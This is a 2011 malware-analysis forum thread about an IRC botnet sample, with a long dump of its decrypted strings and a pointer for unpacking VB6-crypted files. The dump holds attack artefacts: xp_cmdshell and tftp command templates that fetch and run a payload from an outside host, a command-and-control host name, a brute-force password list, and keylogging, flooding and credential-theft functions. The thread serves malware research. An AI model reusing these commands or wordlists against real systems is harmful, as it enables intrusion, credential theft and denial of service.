A forum for reverse engineering, OS internals and malware analysis 

Skonk-[ModBot]-Small

Forum for analysis and discussion about malware.

Skonk-[ModBot]-Small

 #9168  by onthar
 Fri Oct 14, 2011 11:53 pm
Hi there!
I found this sample in the wild. http://www.virustotal.com/file-scan/rep ... 1318634828

It is IRC-based bot, that trying to bruteforce VNC's.
There are some unteresting strings in dumped file, that contains wordlist for bruteforce.
Ddos-functions found too.

Virus injects in explorer.exe

One problem - this sample is crypted with some VB6-crypter. It would be great, if someone explain, how to unpack malware crypted with VB crypters :oops:

I've attached sample and dumped process.
Attachments
password: infected
(300.98 KiB) Downloaded 49 times

Re: Malware/Not classified

 #9169  by nullptr
 Sat Oct 15, 2011 2:13 am
onthar wrote: I found this sample in the wild. http://www.virustotal.com/file-scan/rep ... 1318634828
Internal name is Skonk-[ModBot]-Small-V0.4
Decrypted file VT report 35/43 - http://www.virustotal.com/file-scan/rep ... 1318643571
Code: Select all
Decrypted strings:
qog
?patch
login
logout
ver
test
download
update
port
find
all
stop
stats
threads
procs
open
net
fukoff
die
reboot
nick
join
part
raw
http
tftp
rndnick
secure
unsecure
httpstop
logstop
ftfpstop
procsstop
securestop
reconnect
disconnect
quit
status
botid
aliases
log
clearlog
testdlls
opencmd
cmdstop
who
getclip
flusharp
flushdns
crash
killthreads
prefix
server
dns
killproc
killid
delete
get
list
mirc
rcmd
read
gethost
addalias
action
cycle
mode
repeat
delay
execute
rename
httpcon
upload
keylog
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
frexp
fmod
_hypot
_cabs
ldexp
modf
fabs
floor
ceil
tan
cos
sin
sqrt
atan2
atan
acos
asin
tanh
cosh
sinh
log10
log
pow
exp
GAIsProcessorFeaturePresent
KERNEL32
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
1#QNAN
1#INF
1#IND
1#SNAN
wsprintfA
USER32.dll
WS2_32.dll
VerQueryValueA
GetFileVersionInfoA
GetFileVersionInfoSizeA
VERSION.dll
Sleep
WriteFile
WaitForSingleObject
GetLastError
CreateEventA
ReadFile
CloseHandle
CreateFileA
CopyFileA
MultiByteToWideChar
WideCharToMultiByte
GetTickCount
DeleteFileA
CreateProcessA
OpenProcess
GetCurrentProcessId
SetFileAttributesA
GetFileAttributesA
GetModuleFileNameA
GetModuleHandleA
GetSystemDirectoryA
ExitProcess
CreateMutexA
MoveFileA
GetTempPathA
CreateThread
ExitThread
SetFilePointer
GetFileSize
GetLocalTime
FormatMessageA
GlobalUnlock
GlobalLock
UnmapViewOfFile
MapViewOfFile
CreateFileMappingA
SetFileTime
GetFileTime
ExpandEnvironmentStringsA
GetExitCodeProcess
PeekNamedPipe
DuplicateHandle
GetCurrentProcess
CreatePipe
GetComputerNameA
GetTimeFormatA
GetDateFormatA
FindClose
FileTimeToSystemTime
FileTimeToLocalFileTime
FindNextFileA
FindFirstFileA
TerminateProcess
GetLogicalDrives
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
QueryPerformanceCounter
QueryPerformanceFrequency
LoadLibraryA
GetProcAddress
lstrcpynA
lstrcmpA
lstrcpyA
lstrlenA
GetLocaleInfoA
GetVersionExA
GlobalMemoryStatus
TerminateThread
HeapFree
HeapAlloc
GetTimeZoneInformation
GetSystemTime
HeapReAlloc
RtlUnwind
GetStartupInfoA
GetCommandLineA
GetVersion
GetEnvironmentVariableA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
RaiseException
GetCPInfo
GetACP
GetOEMCP
LCMapStringA
LCMapStringW
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetStringTypeA
GetStringTypeW
SetStdHandle
FlushFileBuffers
SetUnhandledExceptionFilter
IsBadReadPtr
IsBadCodePtr
SetEndOfFile
CompareStringA
CompareStringW
SetEnvironmentVariableA
KERNEL32.dll
(msql)
Trying: (%s:%d) user: (%s/%s).
ROOTED
IP: %s
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
staff
teacher
student
intranet
lan
main
winpass
blank
office
control
nokia
siemens
compaq
dell
cisco
ibm
oracle
orainstall
sqlpassoainstall
sql
databasepassword
data
databasepass
dbpassword
dbpass
access
database
domainpassword
domainpass
domain
hello
hell
god
sex
slut
bitch
fuck
exchange
backup
technical
loginpass
login
mary
katie
kate
george
eric
chris
ian
neil
lee
brian
susan
sue
sam
luke
john
mike
bill
fred
joe
jen
qwe
zxc
peter
bob
asd
qaz
win2000
winnt
winxp
win2k
win98
windows
oeminstall
oemuser
oem
user
homeuser
home
accounting
accounts
www
web
outlook
mail
qwerty
null
server
system
default
changeme
linux
unix
demo
none
guest
test
pwd
pass
pass1234
passwd
password
password1
adm
admins
administrat
administrateur
administrador
administrator
internet
admin
root
Gt8%S
kPxXf
dWN,
.vwp
Windows XP (SP0+SP1)
Windows NT4, 2000 (SP0-SP4)
O2Kp
xZG
\\%s\pipe\browser
\\%s\ipc$
sqlpass
satan
oainstall
%s %s %s User: (%s) Pass: (%s)
(no password)
%s\%s\%s
c$\windows\system32
c$\winnt\system32
Admin$\system32
%s\ipc$
1234qwer
asdfjkl
asdfg
abcdefg
Aaaaaa
1a2b3c
ABC123
a1b2c3d4
Student
testtest
test123
special
abcd1234
star
test1
temp
Password
Abcdef
aaaaaa
secret
1q2w3e
123abc
a1b2c3
School
Qwerty
Internet
newuser
newpass
abc123
utente
usuario
Inhaber
passe
Kennwort
senha
high
ftp
duck
master
owner
register
paper
money
cool
kool
kkk
bass
leet
vnc
cam
comp
computer
change
testing
sexy
pimp
help
monkey
abcdefgh
abcdef
abcde
abcd
abc
%systemroot%\system32\cmd.exe
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - [AuthBypass]
RFB %03d.%03d
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
sucksucksuck
Skonk-[ModBot]-Small-V0.4
xIB
LIB
iexplorer.exe
sysconfig.dat
Microsoft
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
Software\\Microsoft\\OLE
Software\\ASProtect
vnc.blazin-irc.info
weed
junglist
#vnc
junglist
#!INFO
.9-.1::.0[.12 120|MoD.0 ].1::.9-. 
.9-.1::.0[.12 ScAnAgE.0 ].1::.9-. 
.9-.1::.0[.12 RoOtAgE.0 ].1::.9-. 
NT LM 0.12
SMBs
pysmb
ADMIN$
IPC$
Continued
Continue
Paused
Pause
Stopped
Stop
Started
Start
Listed
List
Deleted
Delete
Added
Add
Ime A Fuck U Bot-And Ime Here To Fuck U Up
fbi.edu
%s Bot started
%s %d "%s"
Connected to %s
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
Executed pstore
[SOCKS4]: Failed to start server thread, error: <%d>.
[SOCKS4]: Server started on: %s:%d.
%s Failed to start secure thread, error %d
%s %s System
Unsecuring
Securing
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%s) for %s seconds.
[ICMP]: Invalid flood time must be greater than 0.
[ICMP]: Failed to start flood thread, error: <%d>.
[ICMP]: Flooding: (%s) for %s seconds.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
Normal
Spoofed
[TCP]: Invalid flood type specified.
random
ack
%s Uploading file: %s  to: %s failed
%s Uploading file: %s  to: %s
ftp.exe
open %s
put %s
bye
%s\%i%i%i.dll
%s File not found: %s
tcp
tcpflood
ping
pingflood
udp
udpflood
%s failed to start, no range specified
%s failed to start, syntax is invalid
%s already %d threads. too many specified
%s Failed to start, no range specified
%s Failed to start, syntax is invalid
%s Failed to start thread, error: %d
%s %s Method started at %s :%s for %d minutes %d delay %d threads
Sequential
Random
%s Already %d threads. Too many specified.
%s Failed to start, thread, error %d
%s  Started: %s:%d with delay: %d(ms)
%s Downloading URL: %s to: %s
icmp
icmpflood
%s Rename: '%s' to: '%s'
%s Couldn't execute file
%s ID must be different than current running process
%s Failed to start download thread, error %d
%s Downloading update from: %s
%s%s.exe
syn
synflood
ddos.random
ddos.ack
ddos.syn
Delay
%s Repeat not allowed in command line: %s
%s Repeat: %s
repeat
Mode change: %s
MODE %s
Cycle
Action: %s: %.
ACTION %s
Privmsg: %s: %s
%s Alias added: %s
%s Gethost: %s
%s Unable to extract Gethost command
%s Gethost: %s , Command: %s
%s %s %s :%s
%s Command unknown
%s No message specified
send
%s User list failed
%s User list completed
%s Share list failed
%s Share list completed
share
delete
continue
pause
stop
%s Service list failed
%s Service list complete.
start
%s Failed to load advapi32.dll or netapi32.dll
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger active.
[KEYLOG]: Already running.
[KEYLOG]: No key logger thread found.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
file
[PSNIFF]: No Carnivore thread found.
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
off
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
[PSNIFF]: Carnivore packet sniffer active.
[PSNIFF]: Already running.
psniff
%s Read file failed: %s
%s Read file complete: %s
%s Commands: %s
%s Error sending to remote shell
%s Command sent
%s Client not open
List: %s
%s Send File: %s, User: %s
%s Deleted '%s'
%s Failed to terminate process ID: %s
%s Process killed ID: %s
%s Failed to terminate process: %s
%s Process killed: %s
%s Couldn't resolve hostname
%s Lookup: %s -> %s
%s Server changed to: '%s'
%s Couldn't open file: %s
%s File opened: %s 
open
%s Prefix changed to: '%c'
%s Failed to kill thread: %s
%s Killed thread: %s
%s No active threads found
%s Stopped: %d thread(s)
all
IRC Raw: %s
Parted channel: '%s'.
PART %s
Joined channel: '%s'.
Nick changed to: '%s'.
%s Currently %d Threads
crash
%s Crashing bot
%s TfTp Server started on Port: %d, File: %s, Request: %s
%s Already running
%s Failed to start server thread, error %d
%s Server listening on IP: %s:%d, Directory: %s\.
%s Failed to load dnsapi.dll
%s Failed to flush DNS cache
%s DNS cache flushed
%s Failed to flush ARP cache
%s ARP cache flushed
Get Clipboard
Login list complete
<Empty>
Remote shell
%s Remote shell ready
%s Couldn't open remote shell
%s Remote shell already running
%s Uptime: %s
%s Failed to start listing thread, error %d 
%s Proccess list
full
Already running
Removing Bot
System Info
Network Info
%s Failed to start listing thread, error %d
Listing log
Alias list
%s Failed to start list thread, error %d
List threads
sub
Failed to reboot system
Rebooting system
%s Bot ID: %s
%s Status: Ready. Bot Uptime: %s
QUIT :later
QUIT :%s
Disconnecting
QUIT :disconnecting
Reconnecting
QUIT :reconnecting
Scan
Secure
Process list
[TFTP]
tftpstop
[PING]
Ping flood
pingstop
[UPD]
UDP flood
udpstop
[SYN]
Syn flood
synstop
[DDoS]
DDoS flood
ddos.stop
Log list
[SOCKS4]
Server
socks4stop
socks4
pstore
%s Invalid login slot number: %d
%s No user logged in at slot: %d
%s User %s logged out.
%s Random nick change: %s
$chr(
$server
$rndnick
$chan
$user
User: %s logged in
My Master
%s *Failed host auth by: (%s!%s)
NOTICE %s :Host Auth failed (%s!%s).
%s *Failed pass auth by: (%s!%s)
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s : Password(arg) = '%s'
NOTICE %s : Password(enc) = '%s'
NOTICE %s : Password = '%s'
NOTICE %s : Password(before) = '%s'
NOTICE %s : Authost = '%s'
NOTICE %s : Nickconst = '%s'
NOTICE %s : Channel = '%s'
NOTICE %s : Server = '%s'
NOTICE %s : Version = '%s'
NOTICE %s : Id = '%s'
dump
%s Chat failed by unauthorized user: %s
%s Chat already active with user: %s
%s Failed to start chat thread, error %d
%s Chat from user: %s
CHAT
%s Receive file: '%s' failed from unauthorized user: %s.
%s Failed to start transfer thread, error %d
NOTICE %s :
PING %s
PING
NOTICE %s :
VERSION %s
VERSION
%s Receive file: '%s' from user: %s.
SEND
DCC
NOTICE
PRIVMSG
%s User: %s logged out
Joined channel: %s
QUIT
PART
NICK
NOTICE %s :%s
%s User %s logged out
KICK
NICK %s
JOIN %s %s
PONG %s
PING
%s Failed to send to Remote command shell
%s Failed to open remote command shell
%s Failed to open socket
Socket error
%s Transfer complete to IP: %s  Filename: %s (%s bytes)
%s Unable to open socket
Send timeout.
.DCC SEND %s %i %i %i.
%s File doesn't exist
%s Failed to bind to socket
%s Failed to create socket
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Socket error
%s Error opening socket
%s Error opening file for writing
%s Error unable to write file to disk
%d. %s = %s
AlIaS lIsT
[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s
[LOGS]: Cleared.
Cleared
%s List complete.
Begin
%s IP: %s Port: %d is open
IP: %s Port: %d
%s Bad URL, or DNS Error: %s
%s Update failed: Error executing file: %s
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Opened: %s 
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
%s CRC Failed (%d != %d)
%s Filesize is incorrect: (%d != %d).
%s Update: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s Error: %s <%d>.
mIRC
explorer.exe
SeShutdownPrivilege
%%comspec%% /c %s %s
@echo off
:repeat
del "%%1"
if exist "%%1" goto repeat
del "%s"
%sdel.bat
%s %s :%s
PRIVMSG %s :%s
Proccess has terminated.
Could not read data from proccess.
%s Failed to start IO thread, error  %d 
Remote Command Prompt
cmd.exe
%s %s: No service specified
%s Error with service: '%s'. %s
%s %s service: '%s'.
An unknown error occurred: <%ld>
The system is shutting down.
The service has not been started.
The requested control code cannot be sent to the service because the state of the service.
The service has been marked for deletion.
The service could not be logged on. The account does not have the correct access rights.
The specified service does not exist.
The service has been disabled.
The service depends on another service that has failed to start.
The service depends on a service that does not exist or has been marked for deletion.
The specified database does not exist.
An instance of the service is already running.
The requested control code is not valid, or it is unacceptable to the service.
The process for the service was started, but it did not call StartServiceCtrlDispatcher.
A thread could not be created for the service.
The database is locked.
The service cannot be stopped because other running services are dependent on it.
The service binary file could not be found.
The handle does not have the required access right.
The handle is invalid.
The requested control code is undefined.
The specified service name is invalid.
%s: %s (%s)
Stopped
Starting
Stoping
Running
Continuing
Pausing
Paused
Unknown
The following Windows services are registered:
%s %s: No share specified
%s %s share: '%s'.
%s %s: Error with share: '%s'. %s
%-14S %-24S %-6u %-4s
Yes
%s Share list error: %s <%ld>
Share name:    Resource:                Uses:  Desc:
%s %s: No username specified
%s %s: Error with username: '%s'. %s
%s %s username: '%s'
%s User info error: <%ld>
Units Per Week: %d
Max. Storage: %d
User's Language: %d
Country Code: %d
Workstations: %S
Logon Server: %S
Last Logoff: %d
Last Logon: %d
Number of Logins: %d
Bad Password Count: %d
Password Age: %d
Parameters: %S
Home Directory: %S
Auth Flags: %d
Privilege Level: %s
Guest
User
Administrator
Unknown
Comment: %S
User Comment: %S
Full Name: %S
Account: %S
Total users found: %d.
%s An access violation has occured
%s User list error: %s <%ld>
Username accounts for local system:
Network connection not found.
The user name could not be found.
Share not found.
The computer name is invalid.
An unknown error occurred.
The password is shorter than required (or does not meet the password policy requirement.)
The group already exists.
The user account already exists.
The operation is allowed only on the primary domain controller of the domain.
A general failure occurred in the network hardware.
Level parameter is invalid.
Device or directory does not exist.
Invalid for redirected resource.
Duplicate share name.
The name is invalid.
Access denied.
Not enough memory.
This network request is not supported.
Server name not found.
Invalid parameter.
%s %s <Server: %S> <Message: %S>
%s Message sent successfully
%s Not supported by this system
%s Unable to allocation ARP cache
%s Error getting ARP cache  %d 
%s ARP cache is empty
%s Error getting ARP cache %d
%d.%d.%d.%d
%s Error: server failed, returned  %d 
GET 
HTTP/1.0 200 OK
Server: myBot
Cache-Control: no-cache,no-store,max-age=0
pragma: no-cache
Content-Type: %s
Content-Length: %i
Accept-Ranges: bytes
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Connection: close
HTTP/1.0 200 OK
Server: myBot
Cache-Control: no-cache,no-store,max-age=0
pragma: no-cache
Content-Type: %s
Accept-Ranges: bytes
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Connection: close
HH:mm:ss
ddd, dd MMM yyyy
application/octet-stream
text/html
%s Failed to start worker thread, error  %d 
%s Worker thread of server thread: %d
Found: %i Files and %i Directories
<TD COLSPAN="3"><HR></TD>
</TABLE>
</BODY>
</HTML>
PRIVMSG %s :Found %s Files and %s Directories
%-31s  %-21s (%i bytes)
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE></A>
"><CODE>%.30s></CODE></A>
PRIVMSG %s :%-31s  %-21s (%s bytes)
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE></A>
"><CODE>%.29s>/</CODE></A>
<TD WIDTH="%d"><A HREF="
PRIVMSG %s :%-31s  %-21s
%2.2d/%2.2d/%4d  %2.2d:%2.2d %s
<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
<TD COLSPAN="3"><HR></TD>
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<TABLE BORDER="0">
<HTML>
<HEAD>
<TITLE>Index of %s</TITLE>
</HEAD>
<BODY>
PRIVMSG %s :Searching for: %s
%s %s HTTP/1.1
Referer: %s
Host: %s
Connection: close
Invalid
Disk
Network
Cdrom
RAM
failed
%sKB
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): Failed to stat, device not ready.
SeDebugPrivilege
%s Process list failed
%s Process list completed
%s Listing processes:
%s Netapi32.dll couldn't be loaded
%s Network shares deleted
%s Failed to delete '%S' share.
%s Share '%S' deleted.
%s Failed to delete '%s' share.
%s Share '%s' deleted.
%s Advapi32.dll couldn't be loaded
%s Failed to open IPC$ Restriction registry key
%s Restricted access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
key
035zNWl4FZa/ds8Y7FIVrk/8J9c7I3H6CPODLbCm0EwyK8NQSJFmM8o5+O/1ae9qy44zZ5Mqe9d+2nKVSjvshgFHMoZ+D/UQ8MtBxK7MRmC+d4nEGQ8qSCMazQT4ER9sB8tpWMeqNKAllu+uOmKdfQoD/98deQ8goTTzlQMakTTY=
%s Failed to open DCOM registry key
%s DCOM disabled
%s Disable DCOM failed
EnableDCOM
%s Network shares added
%s Failed to add '%s' share.
%s Share '%s' added.
%s Failed to open IPC$ restriction registry key
%s Unrestricted access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
restrictanonymous
%s DCOM enabled
%s Enable DCOM failed
kthx
%s Transfer Complete On %s Executing ::(
File Not Found
%s Error: socket() failed, returned: %d
octet
ZHx
ZXx
YZqvgff
net-445
net-445
net-139
net-139
vnc-5900
vnc-5900
sym-2967
sym-2967
netbios
NetBios
ntpass
NTPass
sql-1433
sql-1433
net-445
vnc-5900
Total: %d in %s
tftp -i %s get %s &%s
%s Scan not active.
%s Current IP: %s
[FTP]: Failed to start server, error: <%d>.
[FTP]: Server started on Port: %d, File: %s, Request: %s.
%s Failed to start server, error: <%d>.
%s Server started on Port: %d, File: %s, Request: %s.
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
%s Finished at %s:%d after %d minute(s) of scanning.
Failed to start worker thread, error: <%d>.
%s:%d, Scan thread: %d, Sub-thread: %d.
Failed to initialize critical section.
[DDoS]: Done with flood (%iKB/sec).
[DDoS]: Send error: <%d>.
221 Goodbye happy r00ting.
425 Can't open data connection.
ROOTED
IP: %s (%s).
226 Transfer complete.
150 Opening BINARY mode data connection
RETR
200 PORT command successful.
%s.%s.%s.%s
PORT
226 Transfer complete
LIST
425 Passive not supported on this server
PASV
200 Type set to I.
200 Type set to A.
TYPE
257 "/" is current directory.
PWD
350 Restarting.
REST
215 StnyFtpd
SYST
230 User logged in.
PASS
331 Password required
USER
220 StnyFtpd 0wns j0
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Invalid target IP.
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error: socket() failed, returned: <%d>.
[ESC]
[ESC]
[TAB]
[TAB]
[CTRL]
[CTRL]
[WIN]
[WIN]
[WIN]
[WIN]
[PRSC]
[PRSC]
[SCLK]
[SCLK]
[INS]
[INS]
[HOME]
[HOME]
[PGUP]
[PGUP]
[DEL]
[DEL]
[END]
[END]
[PGDN]
[PGDN]
[LEFT]
[LEFT]
[RGHT]
[RGHT]
[DOWN]
[DOWN]
[NMLK]
[NMLK]
[KEYLOG]: %s
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
SHChangeNotify
ShellExecuteA
shell32.dll
WNetCancelConnection2W
WNetCancelConnection2A
WNetAddConnection2W
WNetAddConnection2A
mpr.dll
DeleteIpNetEntry
GetIpNetTable
iphlpapi.dll
DnsFlushResolverCacheEntry_A
DnsFlushResolverCache
dnsapi.dll
NetMessageBufferSend
NetUserGetInfo
NetUserEnum
NetUserDel
NetUserAdd
NetRemoteTOD
NetApiBufferFree
NetScheduleJobAdd
NetShareEnum
NetShareDel
NetShareAdd
netapi32.dll
IcmpSendEcho
IcmpCloseHandle
IcmpCreateFile
icmp.dll
Mozilla/4.0 (compatible)
InternetCloseHandle
InternetReadFile
InternetCrackUrlA
InternetOpenUrlA
InternetOpenA
InternetConnectA
HttpSendRequestA
HttpOpenRequestA
InternetGetConnectedStateEx
InternetGetConnectedState
wininet.dll
closesocket
getpeername
gethostbyaddr
gethostbyname
gethostname
getsockname
setsockopt
accept
listen
select
bind
recvfrom
recv
sendto
ntohl
ntohs
htonl
htons
inet_addr
inet_ntoa
connect
ioctlsocket
socket
WSACleanup
WSAGetLastError
WSAIoctl
__WSAFDIsSet
WSAAsyncSelect
WSASocketA
WSAStartup
ws2_32.dll
DeleteObject
DeleteDC
BitBlt
SelectObject
GetDIBColorTable
GetDeviceCaps
CreateCompatibleDC
CreateDIBSection
CreateDCA
gdi32.dll
GetUserNameA
IsValidSecurityDescriptor
EnumServicesStatusA
CloseServiceHandle
DeleteService
ControlService
StartServiceA
OpenServiceA
OpenSCManagerA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegDeleteValueA
RegQueryValueExA
RegSetValueExA
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetForegroundWindow
GetWindowTextA
GetKeyState
GetAsyncKeyState
ExitWindowsEx
CloseClipboard
GetClipboardData
OpenClipboard
DestroyWindow
IsWindow
FindWindowA
SendMessageA
user32.dll
RegisterServiceProcess
QueryPerformanceFrequency
QueryPerformanceCounter
SearchPathA
GetDriveTypeA
GetLogicalDriveStringsA
GetDiskFreeSpaceExA
Module32First
Process32Next
Process32First
CreateToolhelp32Snapshot
SetErrorMode
kernel32.dll
[MAIN]: DLL test complete.
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s.bck
sfc_os.dll
TCPIP.SYS fixed, version %d.
%s\drivers\tcpip.sys
Patching tcpip.sys.
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
https:/
http:/
:String
StringIndex
[pStore] %s %s:%s
kPStoreCreateInstance
pstorec.dll
const
letter
comp
country
funky
[%s|%s|%s|%s]-
%dd %dh %dm
UNK
essAu
tThru
tftp.exe -i  get 
WRQQj(j
QQUS
:.login
:!login
:.ident
:!ident
:.hashin
:!hashin
:.secure
:!secure
:.auth
:!auth
login 
auth 
HASH
.download 
download 
.update 
getcftp 
sending
JOIN #
NICK 
OPER 
oper 
now an IRC Operator
USER 
PASS 
paypal
PAYPAL
paypal.com
PAYPAL.COM
e-gold.com
e-gold.co.uk
Set-Cookie:
HTTP
FTP
IRC
BOT
[PSNIFF]: Error: recv() failed, returned: <%d>
[PSNIFF]: Suspicious %s packet from: %s:%d - %s.
[PSNIFF]
[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.
[PSNIFF]: Error: bind() failed, returned: <%d>.
[PSNIFF]: Error: socket() failed, returned: <%d>.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Failed to start client thread, error: <%d>.
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SOCKS4]: Error: Failed to connect to target, returned: <%d>.
[SOCKS4]: Error: Failed to open socket(), returned: <%d>.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SYN]: Done with flood (%iKB/sec).
[SYN]: Send error: <%d>.
%s [CpU]: %I64uMHz. [RaM] %sKB total, %sKB free. [DiSk] %s total, %s free. [Os] Windows %s (%d.%d, Build %d). [SyS DiR] %s. [HoStNaMe] %s (%s). [CuRrEnT uSeR] %s. [DaTe] %s. [TiMe] %s. [UpTiMe] %s 
dd:MMM:yyyy
couldn't resolve host
%s [TyPe] %s (%s). [Ip AdDrEsS] %s. [HoStNaMe] %s.
LAN
Dial-up
Not connected
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[TCP]: Invalid target IP.
[TCP]: Error: setsockopt() failed, returned: <%d>.
[TCP]: Error: socket() failed, returned: <%d>.
POST / HTTP/1.0
Host: %s
Content-Length: %d
12 SpEeD TeSt 
: Europe[ %d kbit/s] USA[ %d kbit/s] Asia[ %d kbit/s] Average[ %d kbit/s]
http://www.google.co.jp
yahoo.co.jp
http://www.nifty.com
http://www.d1asia.com
http://www.st.lib.keio.ac.jp
http://www.lib.nthu.edu.tw
http://www.google.com
http://www.easynews.com
http://www.above.net
http://www.level3.com
nitro.ucsc.edu
http://www.burst.net
http://www.cogentco.com
http://www.rit.edu
http://www.nocster.com
http://www.verio.com
http://www.stanford.edu
http://www.xo.net
http://www.google.it
de.yahoo.com
http://www.belwue.de
http://www.switch.ch
http://www.1und1.de
verio.fr
http://www.utwente.nl
http://www.schlund.net
12 ThReAdS lIsT 
%s No %s thread found.
%s %s %s stopped. (%d thread(s) stopped.)
For unpacking, the approach described here http://interestingmalware.blogspot.com/ ... runpe.html
will work for most of this VB Crypt junk.

Decrypted file attached
Attachments
pwd: malware
(87.24 KiB) Downloaded 45 times
 Return to “Malware”